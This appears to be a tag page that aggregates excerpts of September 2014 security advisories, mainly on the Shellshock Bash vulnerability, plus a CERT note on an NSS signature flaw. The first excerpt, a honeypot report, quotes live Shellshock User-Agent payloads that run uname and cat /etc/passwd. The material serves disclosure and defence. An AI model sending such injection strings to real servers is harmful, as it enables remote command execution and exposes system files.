Tagged: vulnerability

Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th) 0

Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th)

Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it. Here is a quick review of exploits that our honeypots and live servers have seen so far: 1 – Simple “vulnerability checks” that used custom User-Agents: () { 0v3r1d3;};echo x22Content-type: text/plainx22; echo; uname -a; () { :;}; echo ‘Shellshock: Vulnerable’ () { :;};echo content-type:text/plain;echo;echo [random string];echo;exit () { :;}; /bin/bash -c “echo testing[number]“; /bin/uname -ax0ax0a Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 x22() { test;};echo x5Cx22Co ntent-type: text/plainx5Cx22; echo; echo; /bin/cat /etc/passwdx22 http://[IP address]/cgi-bin/test.cgi This one is a bit different. It includes the tested URL as user agent

Thumbnail 0

Shellshock: Vulnerable Systems you may have missed and how to move forward, (Mon, Sep 29th)

By now, I hope you are well on your way to patch your Linux systems for the bash code injection vulnerabilities. At this point, you should probably dig a bit deeper and try to find more “hidden” places that may be vulnerable. First of all, a quick list of things that are not vulnerable: iOS, Android and many similar systems that use ash instead of bash

SB14-272: Vulnerability Summary for the Week of September 22, 2014 0

SB14-272: Vulnerability Summary for the Week of September 22, 2014

Original release date: September 29, 2014 The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD , which contains historical vulnerability information

Shellshock FAQ 0

Shellshock FAQ

Shellshock FAQ Version 1.1 – Thursday September 25 13:30PDT This document will be updated and maintained as new or updated information becomes available. Continue to check this page for updates.

VU#252743: GNU Bash shell executes commands in environment variables 0

VU#252743: GNU Bash shell executes commands in environment variables

Vulnerability Note VU#252743 GNU Bash shell executes commands in environment variables Original Release date: 25 Sep 2014 | Last revised: 25 Sep 2014 Overview GNU Bash 4.3 and earlier contains a command injection vulnerability that may allow remote code execution. Description CWE-78 : OS Command Injection Bash supports exporting of shell functions to other instances of bash using an environment variable. This environment variable is named by the function name and starts with a “() {” as the variable value in the function definition.

VU#772676: Mozilla Network Security Services (NSS) fails to properly verify RSA signatures 0

VU#772676: Mozilla Network Security Services (NSS) fails to properly verify RSA signatures

Vulnerability Note VU#772676 Mozilla Network Security Services (NSS) fails to properly verify RSA signatures Original Release date: 24 Sep 2014 | Last revised: 24 Sep 2014 Overview The Mozilla Network Security Services (NSS) library fails to properly verify RSA signatures due to incorrect ASN.1 parsing of DigestInfo. This vulnerability may allow an attacker to forge a RSA signature, such as a SSL certificate. Description CWE-295 : Improper Certificate Validation RSA signatures are used to authenticate the source of a message.